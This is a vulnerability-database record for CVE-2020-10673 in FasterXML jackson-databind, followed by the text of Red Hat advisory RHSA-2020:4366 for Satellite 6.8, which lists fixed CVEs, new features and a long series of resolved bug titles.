"db": "NVD",
"id": "CVE-2020-10673"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163175",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-10673",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158884",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159081",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159082",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1151",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003145",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-10673",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-03-18T00:00:00",
"db": "VULHUB",
"id": "VHN-163175",
"ident": null
},
{
"date": "2020-03-18T00:00:00",
"db": "VULMON",
"id": "CVE-2020-10673",
"ident": null
},
{
"date": "2020-08-17T17:34:41",
"db": "PACKETSTORM",
"id": "158884",
"ident": null
},
{
"date": "2020-07-29T17:53:05",
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"date": "2020-09-17T14:07:40",
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"date": "2020-07-29T00:05:59",
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"date": "2020-09-07T16:38:23",
"db": "PACKETSTORM",
"id": "159081",
"ident": null
},
{
"date": "2020-09-07T16:39:28",
"db": "PACKETSTORM",
"id": "159082",
"ident": null
},
{
"date": "2020-03-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1151",
"ident": null
},
{
"date": "2020-04-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003145",
"ident": null
},
{
"date": "2020-03-18T22:15:12.407000",
"db": "NVD",
"id": "CVE-2020-10673",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "VULHUB",
"id": "VHN-163175",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-10673",
"ident": null
},
{
"date": "2022-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1151",
"ident": null
},
{
"date": "2024-07-22T06:19:00",
"db": "JVNDB",
"id": "JVNDB-2020-003145",
"ident": null
},
{
"date": "2024-11-21T04:55:49.360000",
"db": "NVD",
"id": "CVE-2020-10673",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "158884"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1151"
}
],
"trust": 0.9
},
"title": {
"_id": null,
"data": "FasterXML\u00a0jackson-databind\u00a0 Vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003145"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1151"
}
],
"trust": 0.6
}
}
VAR-202004-0345
Vulnerability from variot - Updated: 2026-03-09 21:51FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop). FasterXML jackson-databind Exists in an unreliable data deserialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. FasterXML jackson-databind has a code issue vulnerability. An attacker could exploit this vulnerability with specially crafted input to execute arbitrary code on the system. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Satellite 6.8 release Advisory ID: RHSA-2020:4366-01 Product: Red Hat Satellite 6 Advisory URL: https://access.redhat.com/errata/RHSA-2020:4366 Issue date: 2020-10-27 CVE Names: CVE-2018-3258 CVE-2018-11751 CVE-2019-12781 CVE-2019-16782 CVE-2020-5216 CVE-2020-5217 CVE-2020-5267 CVE-2020-7238 CVE-2020-7663 CVE-2020-7942 CVE-2020-7943 CVE-2020-8161 CVE-2020-8184 CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10693 CVE-2020-10968 CVE-2020-10969 CVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195 CVE-2020-14334 CVE-2020-14380 ==================================================================== 1. Summary:
An update is now available for Red Hat Satellite 6.8 for RHEL 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Satellite 6.7 - noarch, x86_64 Red Hat Satellite Capsule 6.8 - noarch, x86_64
- Description:
Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool.
Security Fix(es):
- mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018) (CVE-2018-3258)
- netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling (CVE-2020-7238)
- rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser (CVE-2020-7663)
- puppet: puppet server and puppetDB may leak sensitive information via metrics API (CVE-2020-7943)
- jackson-databind: multiple serialization gadgets (CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969 CVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195)
- foreman: unauthorized cache read on RPM-based installations through local user (CVE-2020-14334)
- Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover (CVE-2020-14380)
- Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS (CVE-2019-12781)
- rubygem-rack: hijack sessions by using timing attacks targeting the session id (CVE-2019-16782)
- rubygem-secure_headers: limited header injection when using dynamic overrides with user input (CVE-2020-5216)
- rubygem-secure_headers: directive injection when using dynamic overrides with user input (CVE-2020-5217)
- rubygem-actionview: views that use the
jorescape_javascriptmethods are susceptible to XSS attacks (CVE-2020-5267) - puppet: Arbitrary catalog retrieval (CVE-2020-7942)
- rubygem-rack: directory traversal in Rack::Directory (CVE-2020-8161)
- rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names (CVE-2020-8184)
- hibernate-validator: Improper input validation in the interpolation of constraint error messages (CVE-2020-10693)
- puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL (CVE-2018-11751)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
-
Provides the Satellite Ansible Modules that allow for full automation of your Satellite configuration and deployment.
-
Adds ability to install Satellite and Capsules and manage hosts in a IPv6 network environment
-
Ansible based Capsule Upgrade automation: Ability to centrally upgrade all of your Capsule servers with a single job execution.
-
Platform upgrades to Postgres 12, Ansible 2.9, Ruby on Rails and latest version of Puppet
-
Support for HTTP UEFI provisioning
-
Support for CAC card authentication with Keycloak integration
-
Add ability to upgrade Red Hat Enterprise Linux 7 hosts to version 8 using the LEAPP based tooling.
-
Support for Red Hat Enterprise Linux Traces integration
-
satellite-maintain & foreman-maintain are now self updating
-
Notifications in the UI to warn users when subscriptions are expiring.
The items above are not a complete list of changes. This update also fixes several bugs and adds various enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1160344 - [RFE] Satellite support for cname as alternate cname for satellite server
1261802 - [RFE] Make the foreman bootdisk full-host image work on UEFI systems
1300211 - capsule-certs-generate failed to increment release number when generating certificate rpm for foreman-proxy
1332702 - smart-proxy-openscap-send with additional features - alert if file corrupt
1398317 - For the vms built by Satellite 6 using "Network Based" installation mode on VMWare, unable to change the boot sequence via BIOS
1410616 - [RFE] Prominent notification of expiring subscriptions.
1410916 - Should only be able to add repositories you have access to
1429033 - Host provisioned with RHEL Workstation OS, after provisioning displayed as generic RedHat 7.3
1461781 - [RFE]A button should be available in the GUI to clear the recurring logics.
1469267 - need updated rubygem-rake
1486446 - Content view versions list has slow query for package count
1486696 - 'hammer host update' removes existing host parameters
1494180 - Sorting by network address for subnet doesn't work properly
1501499 - tomcat listens to 0.0.0.0 for serving requests but just needs localhost
1503037 - [RFE] Cancelled future/recurring job invocations should not get the status "failed" but rather "cancelled"
1505842 - Remote Execution engine: Error initializing command: Net::SSH::HostKeyMismatch - fingerprint 20:a9:b7:45:1a:b7:d6:42:1e:03:d1:1f:06:20:4c:e2 does not match for "172.17.0.101"
1531674 - Operating System Templates are ordered inconsistently in UI.
1537320 - [RFE] Support for Capsules at 1 version lower than Satellite
1543316 - Satellite 6.2 Upgrade Fails with error "rake aborted! NoMethodError: undefined method first' for nil:NilClass" when there are custom bookmarks created
1563270 - Sync status information is lost after cleaning up old tasks related to sync.
1569324 - Webrick is unable to use 2 supported TLS v1.2 ciphers ('ECDHE-RSA-AES128-GCM-SHA256', 'ECDHE-RSA-AES256-GCM-SHA384')
1571907 - Passenger threads throwing tracebacks on API jobs after spawning
1576859 - [RFE] Implement automatic assigning subnets through data provided by facter
1584184 - [RFE] The locked template is getting overridden by default
1601101 - [RFE] Add autofill functionality to the Job invocation Search query box, copy from Hosts search box
1607706 - [RFE] Add support for --vlanid in Satellite Kickstart Default provisioning template
1608001 - Rearrange search/filter options on Red Hat Repositories page.
1613391 - race condition on removing multiple organizations simultaneously
1619274 - [RFE] Red Hat Satellite should now be able to discover and provision bare metal machines via UEFI HTTP boot
1619422 - User Agent for Downstream RSS feed still says Foreman and Foreman Version
1620214 - Page should auto-refresh after subscriptions have been modified on the Satellite webui
1624049 - Changing the organization in the Satellite WebUI does not change the sync plan page information from the previous organization
1625258 - Having empty "Allocation (GB)" when creating a new Host, nil:NilClass returned on creating the Host
1627066 - Unable to revert to the original version of the provisioning template
1630433 - [RFE] Include Ansible Satellite modules with Ansible Core modules
1630536 - yum repos password stored as cleartext
1632577 - Audit log show 'missing' for adding/removing repository to a CV
1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)
1645062 - host_collection controller responds with 200 instead of 201 to a POST request
1645749 - repositories controller responds with 200 instead of 201 to a POST request
1647216 - Lack of edit_smart_proxies permission causes error when setting host to Build
1647364 - [RFE] Extend the audits by the http request id
1647781 - Audits contain no data (Added foo to Missing(ID: x))
1651297 - Very slow query when using facts on user roles as filters
1653217 - [RFE] More evocative name for Play Ansible Roles option?
1654347 - Satellite may create duplicate CreateRssNotifications tasks after restarting foreman tasks
1654375 - [RFE] Mention specifically uder the admin chexbox for AD LDAP user if its created with admin role,
1659418 - katello-tracer-upload failing with error "ImportError: No module named katello"
1665277 - subscription manager register activation key with special character failed
1665893 - candlepin refuses to start or hangs periodically when having too many messages in ActiveMQ journal
1666693 - Command "hammer subscription list" is not correctly showing the comment "Guests of " in the "Type" field in the output.
1677907 - Ansible API endpoints return 404
1680157 - [RFE] Puppet 'package' provider type does not support selecting modularity streams
1680458 - Locked Report Templates are getting removed.
1680567 - Reporting Engine API to list report template per organization/location returns 404 error
1681619 - [RFE] Disable the option to enter a MAC address after selecting a compute resource while creating new hosts through Satellite
1685949 - [RFE] Support passing of attribute name instead of Id's in RHV workflow
1687116 - kernel version checks should not use /lib/modules to determine running version
1688886 - subscription-manager not attaching the right quantity per the cpu core
1691416 - Delays when many clients upload tracer data simultaneously
1697476 - [RFE] To be able to see the name of the provisioning template being used to build a host from the host itself
1702434 - foreman-bootloaders-redhat-tftpboot expected file permissions in package don't match runtime permissions
1705097 - An empty report file doesn't show any headers
1709557 - [RFE] warn the user if they have done a select all and it includes the restart|reboot service
1709842 - Tracer shows the machines needs rebooting even after reboot if kernel-debug is installed
1710511 - Filter by os_minor includes unexpected values on the Satellite web UI.
1715999 - Use Infoblox API for DNS conflict check and not system resolver
1716423 - Nonexistent quota can be set
1717403 - Broken breadcrumbs link to compute resource VM list on VM detail page
1718012 - [RFE] Add a hard limit of 100 items to restrict any fact child-hash/array
1718954 - [RFE] When the contentAccessMode is set to org_environment for an owner, we should disable auto-attach globally
1719509 - [RFE] "hammer host list" including erratas information
1719516 - [RFE] "hammer host-collection hosts" including erratas information
1720725 - [RFE] Ability to override DHCP options and wait_after_restart option for race condition
1721419 - SSH key cannot be added when FIPS enabled
1722954 - Slow performance when running "hammer host list" with a high number of Content Hosts (15k+ for example)
1723313 - foreman_tasks:cleanup description contain inconsistent information
1724494 - [Capsule][smart_proxy_dynflow_core] "PID file /var/run/foreman-proxy/smart_proxy_dynflow_core.pid not readable (yet?) after start"
1724497 - CVE-2019-12781 Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS
1726768 - [RFE] Red Hat Satellite 6 GUI, Tasks should show Full name
1729968 - Editing disk size of a Compute Profile for a VMware Compute Resource makes the whole Storage section disappear
1730083 - [RFE] Add Jobs button to host detail page
1731155 - Cloud init template missing snippet compared to Kickstart default user data
1731229 - podman search against Red Hat Satellite 6 fails.
1731235 - [RFE] Create Report Template to list inactive hosts
1733241 - [RFE] hammer does not inherit parent location information
1733650 - Satellite receives RPM1004 pulp error and 403 Forbidden http error retrieving packages from CDN
1736809 - undefined methodsplit' for nil:NilClass when viewing the host info with hammer
1737135 - Content Hosts loses subscriptions after Vmotion and auto attach is unable to assigned the subscriptions if any other subscription is already attached to the host.
1737564 - [RFE] Support custom images on Azure
1738548 - Parameter --openscap-proxy-id is missing in hammer host create command.
1740943 - Increasing Ansible verbosity level does not increase the verbosity of output
1743056 - While creating a host for a particular location, all the domains are in the pull down list, even if only one domain is selected for that location.
1743776 - Error while deleting the content view version.
1745516 - Multiple duplicate index entries are present in candlepin database
1746936 - satellite6 is not using remote execution by default even after setting remote execution by default from satellite web-UI.
1749692 - Default Rhel8 scap content does not get populated on the Satellite
1749916 - [RFE] Satellite should support certificates with > 2048 Key size
1751981 - Parent object properties are not propagated to Child objects in Location and Host Group
1752880 - katello-host-tools-tracer stats paths abusively, leading to a hang or slowness of yum command
1753551 - Traces output from Satellite GUI has mismatches with client tracer output
1756991 - 2 inputs with same name -> uninitialized constant #::NonUniqueInputsError
1757317 - [RFE] Dynflow workers extraction
1757394 - [BUG] Non-admin users always get "Missing one of the required permissions" message while accessing their own table_preferences via Satellite 6 API
1759160 - Rake task for cleaning up DHCP records on proxy
1761872 - Disabled buttons are still working
1763178 - [RFE] Unnecessary call to userhelp and therefore log entries
1763816 - [RFE] Report which users access the API
1766613 - Fact search bar broken and resets to only searching hostname
1766906 - Associating more than 10 Ansible roles to a Host only sets based on the per-page setting
1767497 - Compute Resource filter does not correctly allow Refresh Cache
1767635 - [RFE] Enable Organization and Location to be entered not just selected
1770366 - [RFE] Improve upgrade efficiency by moving RPM post-installation scripts to the installer.
1770544 - Puppet run job notification do not populate "%{puppet_options}"' value
1770777 - Changing concurrency level while executing Ansible jobs fail with NoMethodError: undefined method []' for nil:NilClass
1771367 - undefined methodrequest_uri' when Openidc Provider Token Endpoint is none
1771428 - Openscap documentation link on Satellite 6 webui is broke
1771484 - Client side documentation links are not branded
1771693 - 'Deployed on' parameter is not listed in API output
1772381 - Incorrect example to use multiple attributes as a matcher key in the tooltip for Order
1772517 - login with the user name as same as existing user group gives 500 ISE and wont allow user to login again
1772544 - Use APIv4 is not the default when creating a new compute resource in ovirt
1773298 - GET /katello/api/srpms/compare always fails with error: Missing template katello/api/v2/common/compare
1774710 - UI: When selecting the server type in ldap authentication, "attribute mappings" fields could be populated automatically
1778396 - exporting/importing report template process is causing a different report during the visualization (blank lines)
1778503 - Prepended text on OS name creation
1778681 - Some pages are missing title in html head
1779638 - Unable to filter/search http-proxies using Organization/Location for Satellite UI.
1781671 - While using concurrency_level in remote execution, job progress in WebUI is not being updated properly
1782352 - [RHEL 8.1 client] All packages are not getting updated after click on "Update All Packages"
1782426 - Viewing errata from a repository returns incorrect unfiltered results
1783568 - [RFE] - Bulk Tracer Remediation
1783882 - Ldap refresh failed with "Validation failed: Adding would cause a cycle!"
1784012 - Default kickstart places log to /mnt/sysimage/root/install.post.log
1784341 - disable CertificateRevocationListTask job in candlepin.conf by default
1785117 - [RFE] Add functionality in foreman logging to hash-out or mark as [FILTERED] the password in /var/log/foreman-maintain/foreman-maintain.log and /var/log/foreman-installer/satellite.log file
1785231 - Ansible Variable override to false does not gets reflected on client machine on Red Hat Satellite 6.
1785624 - [UI] Importing templates with associate 'never' is not resulting as expected
1785683 - Does not load datacenter when multiple compute resources are created for same VCenter
1785902 - Ansible RunHostJob tasks failed with "Failed to initialize: NoMethodError - undefined method []' for nil:NilClass"
1785940 - [RFE] Reporting template should allow host filtering based on applicable errata issue date
1787329 - change filename in initrd live CPIO archive to fdi.iso
1788261 - CVE-2018-11751 puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL
1788958 - [RFE] add "elapsed time" column to export and hammer, make it filterable in WebUI
1789006 - Smart proxy dynflow core listens on 0.0.0.0
1789100 - CVE-2019-16782 rubygem-rack: hijack sessions by using timing attacks targeting the session id
1789434 - Template editor not always allows refreshing of the preview pane
1789522 - On unhealthy Satellite, dynflow_envelopes table might grow indefinitely
1789686 - Non-admin user with enough permissions can't generate report of applicable errata
1789815 - The "start" parameter should be mentioned inside "--compute-attributes:" in hammer_cli for Satellite 6
1789911 - "foreman-rake katello:publish_unpublished_repositories" is referring to column which no longer exists in katello_repositories table.
1789924 - [RFE] As user I want to see a "disabled" status for Simple Content Access (Golden Ticketed) Orgs
1791654 - drop config_templates api endpoints and parameters
1791656 - drop deprecated host status endpoint
1791658 - drop reports api endpoint
1791659 - Removeuse_puppet_defaultapi params
1791663 - remove deprecated permissions api parameters
1791665 - drop deprecated compute resource uuid parameter
1792131 - [UI] Could not specify organization/location for users that come from keycloak
1792135 - Not able to login again if session expired from keycloak
1792174 - [RFE] Subscription report template
1792304 - When generating custom report, leave output format field empty
1792378 - [RFE] Long role names are cut off in the roles UI
1793951 - [RFE] Display request UUID on audits page
1794015 - When using boot disk based provisioning, sometimes foreman tries to recreate folder foreman_isos in the datastore even when the folder already exists
1794346 - Change the label for the flashing eye icon during user impersonation
1794641 - Sync status page's content are not being displayed properly.
1795809 - HTML tags visible on paused task page
1796155 - [RFE] host_collections not available in reporting engine unless safe mode disabled
1796205 - iso upload: correctly check if upload directory exists
1796225 - CVE-2020-7238 netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling
1796259 - loading subscriptions page is very slow
1796697 - Unable to list/enable EUS repositories on the RHEL clients registered in the satellite server with org_environment contentAccessMode
1798489 - [RHSSO] - If Access Token Lifespan is set to 5 mins then the user is getting sign out instead after idle SSO timeout
1798668 - Configure default MongoDB WiredTiger cache to be 20% of RAM in the Satellite server
1799480 - CLI - hammer repository info shows blank sync status if the repository sync is in warning/error state.
1800503 - In Hammer, it is not possible to set default keyboard layout for a RHEV host
1801264 - CVE-2020-5217 rubygem-secure_headers: directive injection when using dynamic overrides with user input
1801286 - CVE-2020-5216 rubygem-secure_headers: limited header injection when using dynamic overrides with user input
1802529 - Repository sync in tasks page shows percentage in 17 decimal points
1802631 - Importing Ansible variables yields NoMethodError: undefined methodmap' for nil:NilClass (initialize_variables) [variables_importer.rb]
1803846 - Red Hat Insights Risk Summary shows systems at risk while there are none
1804496 - While performing bulk actions, unable to select all tasks under Monitor --> Tasks page.
1804651 - Missing information about "Create Capsule" via webUI
1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages
1805727 - Default Custom Repository download policy setting refers to old name (Default Repository download policy) in satellite 6.7
1806713 - hypervisor checkin fails with cp_consumer_hypervisor_ukey error
1806842 - Disabling dynflow_enable_console from setting should hide "Dynflow console" in Tasks
1806897 - Red Hat Inventory Uploads fail with NoMethodError: undefined method mtu'
1807042 - [RFE] Support additional disks for VM on Azure Compute Resource
1807321 - A non-admin users with view recurring_logics permissions are unable to list recurring logics.
1807829 - Generated inventory file doesn't exist
1807946 - Multiple duplicate index entries are present in foreman database
1808843 - Satellite lists unrelated RHV storage domains using v4 API
1810250 - Unable to delete repository - Content with ID could not be found
1810549 - dropping packets to qdrouterd triggers a memory leak in qpid-proton 0.28.0-2 libraries used by goferd
1810774 - Applying errata via Host Collection the errata are trying to be applied to all hosts associated with the host collection
1811390 - Links to an errata list of a repository lack repositoryId in URI and points to generic "errata" page instead
1812031 - Improve regenerate applicability tasks performance by querying NEVRA only data from repo_content_units
1812858 - Satellite Inventory Plugin does not appear to make reports which match yupana's API specification
1812904 - 'Hypervisors' task fails with 'undefined method[]' for nil:NilClass' error
1813005 - Prevent --tuning option to be applied in Capsule servers
1813313 - [Tracker] Test HTTP UEFI on IPv6 (QA only tracker)
1814095 - Applicable errata not showing up for module stream errata
1815104 - Locked provisioning template should not be allowed to add audit comment
1815135 - hammer does not support description for custom repositories
1815146 - Backslash escapes when downloading a JSON-formatted report multiple times
1815608 - Content Hosts has Access to Content View from Different Organization
1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking
1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config
1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap
1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core
1816699 - Satellite Receptor Installer role can miss accounts under certain conditions
1816720 - CVE-2020-7942 puppet: Arbitrary catalog retrieval
1816853 - Report generated by Red Hat Inventory Uploads is empty.
1817215 - Admin must be able to provide all the client ids involved inside Satellite settings.
1817224 - Loading one org's content view when switching to a different org
1817481 - Plugin does not set page
1817728 - Default task polling is too frequent at scale
1817874 - After data upload from satellite UI it is not visible on cloud.redhat.com.
1818062 - Deprecated message about katello agent being shown on content host registration page
1818816 - Web console should open in a new tab/window
1819145 - [RFE] Incorporate apipie-dsl to document template macros, provided as one-time generated HTML document
1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider..RmiProvider
1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane
1820193 - Deleted Global Http Proxy is still being used during repository sync.
1820245 - reports in JSON format can't handle unicode characters
1821182 - [Repository] - Packages are not getting synced with rpm-with-sha-512
1821335 - Inventory plugin captures information for systems with any entitlement
1821457 - [RFE] Capsules shouldn't update hosts' "Registered through" facts on the Satellite server in a load-balanced configuration.
1821629 - Eager zero seems to do nothing
1821651 - Manifest import task progress remains at 0.
1821752 - New version of the plugin is available: 1.0.5
1822039 - Get HTTP error when deploying the virt-who configure plugin
1822560 - Unable to sync large openshift docker repos
1823905 - Update distributor version to sat-6.7
1823991 - [RFE] Add a more performant way to sort reports
1824183 - Virtual host get counted as physical hosts on cloud.redhat.com
1824931 - After upgrading to Satellite 6.7 the Tasks page in WebUI goes "Blank"
1825760 - schedule inventory plugin sync failed due to 'organization_id' typecasting issue.
1825930 - [Regression] RedHat Insights client proxying stopped working due to missing proxy
1825978 - Manifest refresh failed with 'Katello::Errors::CandlepinError Invalid credentials.' error
1826298 - even when I cancel ReX job, remediation still shows it as running
1826340 - [RFE] Ability to provision a VM using Red Hat Gold BYOS images
1826515 - [RFE] Consume Candlepin events via STOMP
1826625 - Improve performance of externalNodes
1826678 - New version of the plugin is available: 2.0.6
1826734 - Tasks uses wrong controller name for bookmarks
1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop
1827389 - Manifest import and delete calls Actions::Pulp::Repository::Refresh for non-Library repositories
1827583 - Installing dhcp_isc and dhcp_remote_isc fails with "You cannot specify the same gem twice with different version requirements.....You specified: rsec (< 1) and rsec (>= 0)"
1828257 - Receptor init file missing [Install] section, receptor service won't run after restart
1828486 - CVE-2020-7943 puppet: puppet server and puppetDB may leak sensitive information via metrics API
1828549 - Manifest Certificate Exposed by Unprivileged User
1828682 - Create compute resource shows console error 'Cannot read property 'aDataSort' of undefined'
1828789 - [RFE] Satellite installer should support installing the Satellite Inventory Provider by default
1828868 - Add keep alive option in Receptor node
1829487 - Ansible verbosity level does not work
1829766 - undefined method tr' for nil:NilClass when trying to get a new DHCP lease from infoblox
1830253 - Default job templates are not locked
1830403 - Capsule sync fails when promoting a content view to more than one lifecyle env at the same time
1830834 - Unable to update default value of a smart class parameter (Sql query error).
1830860 - Refactor loading regions based on subscription dynamically
1830882 - Red Hat Satellite brand icon is missing
1830884 - bootstrap.py script tries to yum install puppet package that is not in rhel-7-server-satellite-tools-6.7-rpms repo
1831528 - CVE-2020-5267 rubygem-actionview: views that use thejorescape_javascriptmethods are susceptible to XSS attacks
1833031 - Improve RH account ID fetching in cloud connector playbook
1833035 - Add remediation bulk ack message (i.e. all hosts for a given run has finished)
1833039 - Introduce error code to playbook_run_finished response type
1833311 - "Failed to save: Failed to save when overriding parameters for ansible, cause: Default value is invalid" while creating scap policy with ansible deployment option.
1834302 - --enable-foreman-plugin-rh-cloud fails: Execution of '/bin/yum -d 0 -e 0 -y install tfm-rubygem-foreman_rh_cloud' returned 1: Error: Nothing to do
1834377 - Disable mongo FTDC
1834866 - Missing macro for "registered_at" host subscription facet
1834898 - Login Page background got centralized and cropped
1835189 - Missing macro for "host_redhat_subscriptions" in host subscription facet
1835241 - Some applicability of the consumers are not recalculated after syncing a repository
1835882 - While executing "Configure Cloud Connector" playbook on Satellite 6.7 server it does not honour HTTP Proxy setting
1836155 - Support follow on rails, travis and i18n work for AzureRm plugin
1836771 - In satellite installation summary report, satellite should be mentioned instead of foreman.
1836774 - Some foreman services failed to start (pulp_streamer)
1836845 - "Generate at" in report template should be current date
1837951 - "invalid Unicode Property \p: /\b\perform various actions through those proxies\b(?!-)/" warning messages appears in dynflow-sidekiq@worker-hosts-queue
1838160 - 'Registered hosts' report does not list kernel release for rhsm clients
1838191 - Arrow position is on left rather in the middle under "Start Time"
1838281 - CVE-2020-8161 rubygem-rack: directory traversal in Rack::Directory
1838917 - Repositories are not showing their available Release versions due to a low default db pool size
1838963 - Hypervisors from Satellite, never makes their way to HBI
1838965 - Product name link is not working on the activation keys "Repository Sets" tab.
1839025 - Configure Cloud Connector relies on information which is no longer provided by the API
1839649 - satellite-installer --reset returns a traceback
1839726 - Bring tfm-rubygem-foreman_leapp to downstream builds
1839779 - undefined local variable or methodimplicit_order_column' for # on GET request to /discovery_rules endpoint
1839966 - New version of the plugin is available: 2.0.7
1840166 - ERF42-4995 [Foreman::Exception]: Invalid authenticity token message displayed with traceback, If re-login the machine after session timed-out .
1840191 - Validate parameters passed by receptor to the receptor-satellite plugin
1840218 - ArgumentError: wrong number of arguments
1840525 - Content host list doesn't update after the successful deletion of content host.
1840635 - Proxy has failed to load one or more features (Realm)
1840723 - Selected scenario is DISABLED, can not continue
1840745 - Satellite installation failed with puppet error " No Puppet module parser is installed"
1841098 - Failed to resolve package dependency while doing satellite upgrade.
1841143 - Known hosts key removal may fail hard, preventing host from being provisioned
1841573 - Clicking breadcrumb "Auth Source Ldaps" on Create LDAP Auth Source results in "The page you were looking for doesn't exist."
1841818 - icons missing on /pub download page
1842900 - ERROR! the role 'satellite-receptor' was not found in ...
1842943 - ~foreman-proxy/.ssh is a symlink to /usr/com/foreman-proxy/ssh/
1843406 - In 6.8, Receptor installation playbook's inputs are visible again
1843561 - Report templates duplicated
1843846 - Host - Registered Content Hosts report: "Safemode doesn't allow to access 'report_hraders' on #"
1843867 - Satellite-installer failed with argument error while upgrading the satellite from 6.7 to 6.8
1843926 - satellite-change-hostname fails when running nsupdate
1844142 - [RFE] Drop a subsription-manager fact with the satellite version
1845112 - Installer deploys outdated version of pxegrub2 mac template to TFTP
1845486 - [RFE] Able to select 'HTTP Proxy' during Compute Resource create for 'GCE' as similar to EC2
1845860 - hammer org add-provisioning-template command returns Error: undefined method []' for nil:NilClass
1845978 - CVE-2020-7663 rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser
1846254 - need to restart services after enabling leapp plugin
1846313 - Add index on locks for resource type and task id
1846317 - undefined methodklass' for nil:NilClass
1846421 - build pxe default do not work when more than 1 provider
1846593 - Satellite-installer failed with error "Could not find a suitable provider for foreman_smartproxy" while doing upgrade from 6.7 to 6.8
1847019 - Empty applicability for non-modular repos
1847063 - Slow manifest import and/or refresh
1847407 - load_pools macro not in list of macros
1847645 - Allow override of Katello's DISTRIBUTOR_VERSION
1847784 - Error updating system data on the server, see /var/log/rhsm/rhsm.log for more details.
1847840 - Libvirt note link leads to 404
1847871 - Combined Profile Update: ArgumentError: invalid argument: nil.
1848291 - Download kernel/initram for kexec asynchronously
1848535 - Unable to create a pure IPv6 host
1848538 - Failed to resolve the packages due to tfm-runtime package dependency in fm-upgrade(6.7 to 6.8)
1848902 - ERF42-0258 [Foreman::Exception]: is not valid, enter id or name
1848958 - CVE-2020-14195 jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory
1848962 - CVE-2020-14062 jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool
1848966 - CVE-2020-14061 jackson-databind: serialization in weblogic/oracle-aqjms
1848973 - capsule-certs-generate suggests running foreman-installer --scenario foreman-proxy-content instead of satellite-installer --scenario capsule
1849141 - CVE-2020-8184 rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names
1849656 - ERROR! You cannot use loops on 'import_tasks' statements. You should use 'include_tasks' instead.
